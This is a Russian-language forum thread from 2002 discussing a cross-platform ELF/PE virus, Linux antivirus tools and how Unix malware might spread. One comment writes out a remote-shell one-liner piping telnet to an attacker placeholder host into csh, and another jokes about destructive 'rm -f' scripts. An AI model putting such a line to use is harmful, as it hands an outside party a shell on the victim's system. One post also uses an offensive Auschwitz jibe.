 |
 |
|
|
Место для Вашей рекламы!
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Предыдущие публикации:Обсуждение и комментарии |
 |
 | me - user internet.com5 Jun 2002 11:26 PM |
| Типа, дождались:)) Кто там пел о принципиальной невозможности существования вирусов в ELF файликах?:))) | |
| | |
| Qrot 5 Jun 2002 11:31 PM |
| да, мы в предвкушении :)) | |
| | |
| Skull - sibskullmail.ru 6 Jun 2002 6:25 AM |
| 2me: про теоретическую возможность распространения через ELF PTO уже сказал. И юниксоиды с этим с кучей оговорок согласились. Речь идет о другом - _КАК_ этот вирус будет активирован. Причем в очень гетерогенной структуре дистрибутивов? Мылеры не открывают файлов на исполнение. Пожалуй, только архив с сохранением аттрибутов. Но архиваторы типа ark тоже этого не делают. Остаются только дыры. Но в связи с постоянным выходом халявных дистров ПО часто обновляется. Резюмируя: есть возможность заражения через дыры. Трюки с запуском по расширению, как в OE не проходят. Поэтому можно спать спокойно. | |
| | |
| eXOR - billgmicrosoft.com 6 Jun 2002 7:31 AM |
| 2 me: Всегда было имхо очевидно что существовать они там могли, только вот эффективность какая - ы? :-) Да и кстати... если верить статье то в антивирусных конторах сидят полные пробитые лохи... вирус - то не очень и прячется... уловки все чуть ли не стандартные. Гыы... а то что написали заражалку для двух платформ - показатель того, что у автора вируса очень плоская жопа... ибо задача совсем не интересная, зато очень и очень нудная. | |
| | |
| me - userinternet.com 6 Jun 2002 10:29 AM |
| >> Всегда было имхо очевидно что существовать они там могли Для меня это тоже очевидно:)) Но вот для некоторых очень умных перцев, появляющихся иногда на местных форумах - нет. | |
| | |
| Qrot 6 Jun 2002 10:35 AM |
| 2eXOR: да нет там ничего нудного! что мешает на самом деле написать минимальную либу, работающую и с линуксовым ядром и с нт-евым (минуя либси)? а ничего не мешает, надо заметить.. так что у парня не плоская жопа, а голова светлая раз одинаково легко понимает работу линуха и нт... а такой вопрос - антивирусы под линукс есть? :) хоть бы аидстест какой завалящий :)) | |
| | |
| Qrot 6 Jun 2002 10:39 AM |
| 2eXOR: первые вирусы под дос и винду цвели самым махровым цветом на ВЦ институтов и университетов.. первокурсники вобщем не самые продвинутые юзера :)) правда, иногда вирусы там же и создавались... так что если где в универе стоят x86 с линухом и с общим доступом - считай, попали :) | |
| | |
| Наблюдатель 6 Jun 2002 11:02 AM |
| 2Qrot DrWeb под linux есть, по-моему. | |
| | |
| Проходивший мимо 6 Jun 2002 11:04 AM |
| 2Qrot: > что мешает на самом деле написать минимальную либу, > работающую и с линуксовым ядром и с нт-евым (минуя либси) то, что она по размерам будет не на много меньше самой glibc и самих виндовых библиотек. Тогда уж проще взять исходники glibc и повыкидать неиспользуемые в вирусе куски кода. Или линковать его как static (а это опять же увеличит размеры вируса...) - что кстати избавит вирус от зависимости от версии glibc, установленой на атакуемой системе. Или ещё его можно собирать на атакованой машине - как в вирусе by R.T.Morris (вспомним 1986 год). Система атаковалась небольшим модулем, после проникновения в систему тело червя линковалось на зараженной машине - т.е. вирус таскал с собой свои объектные модули). С виндой всё усложняется отсутствием исходников виндовых библиотек и закрытостью системы (только не надо тут вспоминать про MSDN - покажите мне документацию по kernel features, etc). > а такой вопрос - антивирусы под линукс есть Дык! Давно уже. И с успехом используются для фильтрации входящей почты (подробности см. на сайтах производителей антивирусов). 2ALL: Вирус при желании можно написать под что угодно - в своё время из любопытства их писали под RSX-11M, только это не значило, что тут же началась эпидемия - там нормальная система разделения прав - so... | |
| | |
| SlvUn - slvunmail.ru 6 Jun 2002 11:16 AM |
| М-да, вирусы под Линукс конечно будут, по простой причине - их намного легче писать. :)) Сейчас я объясню почему. Что в *nix'ах можно сделать через шелл надеюсь все знают, для тех кто не знает - правильый ответ все что угодно :)). Убежден на 100% что основную опасность будут представлять из себя не гиперумные программы способные работать с динамической и статической линковкой бинарников, и не всякие резиденты скрывающие свое присутствие и изменяющие свой размер, и не вирусы перехватывающие вызовы glibc, и не etc. Самыми страшными вирусами будут обычные тупые шелловские скрипты, содержащие а-ля rm -f Как же они будут распространяться? Да очень просто, большинство юзеров будут преспокойно скачивать такие файлы, или сохранять вложения и не глядя их запускать. А работать они будут есс-но из под рута. Тут им и абздец. Вот такое немного печальное видение будущего. Единственная надежда - что люди научаться заводить себе юзверей без администраторских прав, но в это я не верю. | |
| | |
| Qrot 6 Jun 2002 11:18 AM |
| 2Проходивший мимо: два слова только скажи про эти антивирусы - они только почту фильтруют? а память проверяют, а винт сканируют? если вирус полиморфный, сигнатура у него постоянно меняться будет, АФАИК, так что аттачмент может и пройти.. ИМХО, такая либа по размерам будет значительно меньше глибси - нужны только файловые операции, как я понимаю, и то немного.. сделать все очень тупо и просто - и здравствуй, вот и я :) отсутствие исходников под винды на самом деле мало что усложняет - есть SoftICE, есть куча книжек типа Native NT или Undocumented NT.. если человек профи (а автор судя по всему профи) то сложностей особых нет... мои соболезнования на самом деле... и поздравления - момент можно сказать исторический! :) | |
| | |
| Проходивший мимо 6 Jun 2002 12:06 PM |
| 2Qrot: >два слова только скажи про эти антивирусы - они только почту фильтруют? Не только - они делают то же что и обычные виндовые. Просто я лично прикручивал их к sewndmail-у (один раз это был drweb, второй раз - avp). Для остального они мне были бесполезны (оба раза была разовая работенка - поставить smtp/pop3/imap/proxy/firewall на одной машине для мелких контор). Уже больше года работают на полном автопилоте - антивирусные базы обновляют по cron-у ч-з i-net. > такая либа по размерам будет значительно меньше > глибси - нужны только файловые операции всё зависит насколько развесистый будет вирус - если будет например атаковать удаленные системы ч-з i-net - то сразу потянутся функции работы с ip стеком, библиотеки nss, им в свою очередь понадобятся функци работы с памятью, и.т.д - по цепочке. В результате выйдет не так уж и мало. А если это будет простенький файловый вирус типа dos-овских - то стоит ли из-за этого огород городить ?...А вообще SlvUn прав - самый универсальный код - это написаный на скриптовых языках. Сейчас на большей части unix like систем есть например perl... Ну что - напишем всей тусовкой вирус, который бы таскал с собой perl и нужные модули бы подгружал с cpan.org ? ;) PS: Последний абзац - это шутка, для тех кто не понял. | |
| | |
| Qrot 6 Jun 2002 12:33 PM |
| 2Проходивший мимо: спасибо что рассказал, а то я по простоте душевной все думал что на линуксах никто и не чешется по этому поводу. в каждой шутки есть доля шутки... как я понимаю, что бы выполнить строку типа csh < telnet <atacker_addr> <port> много ума не надо... | |
| | |
| eXOR - billgmicrosoft.com 6 Jun 2002 12:34 PM |
| 2 Qrot: Дыкть а что - там понимать то в работе WinNT/Linux? Для инфицирования ELF, так же как и PE требуется только прочтенние 2 страничной доки с форматом файла... Профи - тот кто придумывает что - то новое в вирусописании... хитрый алгоритмик для прятанья себя от антивирей, умный механизм траханья железа... итд... а это имхо - просто плоскожопие... слепил поддержку 2-х форматов и готово... Поддержка MZ и PE давно уже сделана была... это считай то же самое. | |
| | |
| Qrot 6 Jun 2002 12:40 PM |
| 2eXOR: я не про форматы говорил, а про работу непосредственно с ядром | |
| | |
| Skull - sibskullmail.ru 7 Jun 2002 5:45 AM |
| 2SlvUn: "преспокойно скачивать такие файлы, или сохранять вложения и не глядя их запускать" - не забывайте, что нужно еще и +x сделать. :) Запуск по расширению с выполнением под Unix очень усложнен. | |
| | |
| Skull - sibskullmail.ru 7 Jun 2002 5:48 AM |
| 2Qrot: ну что же Вы так! Хоть бы потрудились почитать на сайтах AVP, DrWEB, antivirus.com - эти антивирусы _всё_ мониторят и лечат. Просто большинство админов их на почту ставят. | |
| | |
| ####### 7 Jun 2002 10:03 AM |
| Такие все "крутые" спецы (бываю часто на форуме), а не знают элементарного про те же антивирусы. Странно... А сами их что, вообще не используете? Теперь понятно, что если такие "профи" админы, то почему мнее пришло 39 инфицированных Клезом рассылок за ночь. | |
| | |
| ####### 7 Jun 2002 10:03 AM |
| Такие все "крутые" спецы (бываю часто на форуме), а не знают элементарного про те же антивирусы. Странно... А сами их что, вообще не используете? Теперь понятно, что если такие "профи" админы, то почему мнее пришло 39 инфицированных Клезом рассылок за ночь. | |
| | |
| eXOR - billgmicrosoft.com 7 Jun 2002 10:33 AM |
| 2 ###: Дыкть... господин должен понимать что админы не боги... и от тупого узверя есть только одно лекарство - гранатомет. (тупой имеется ввиду тот, кому 5 раз сказали что так делать нельзя, а он(а) все - равно продолжает). | |
| | |
| Bosch - boschpisem.net 7 Jun 2002 10:49 AM |
| 2 eXOR Easy, easy! А от тупых админов, которые считают, что компы и сеть для того существуют, чтобы их раз отадминистрить, запретить всем все, настроить, залить эпоксидкой и флеймить на ЗиДиНет-е, также есть одно средство - Auschwitz. Поэтому... "Граждане пассажиры, будьте взаимно вежливы!". | |
| | |
| EROS - boooohotbox.ru 7 Jun 2002 6:06 PM |
| EROS спасет отца русской демократии. | |
| | |
| eXOR - billgmicrosoft.com 10 Jun 2002 11:02 AM |
| 2 Bosch: Ты не правильно понял. Я специально в скобочках пояснил что такое тупой юзверь... Это такой узверь, который считает что его святая задача _ВСЮ_ работу с компьютером переложить на плечи админа. Т.е. тот кто считает что работая с компом он не должен знать как тот включается, как вставляется дискета. Т.е. тот, кто не умеет и не хочет пользоваться _СВОИМ_РАБОЧИМ_ИНСТРУМЕНТОМ_. А по - поводу вежливости.... согласен :-). | |
| | |
| ← май 2002 | 2 3 4 5 6 7 10 11 12 | июль 2002 → |
Место для Вашей рекламы!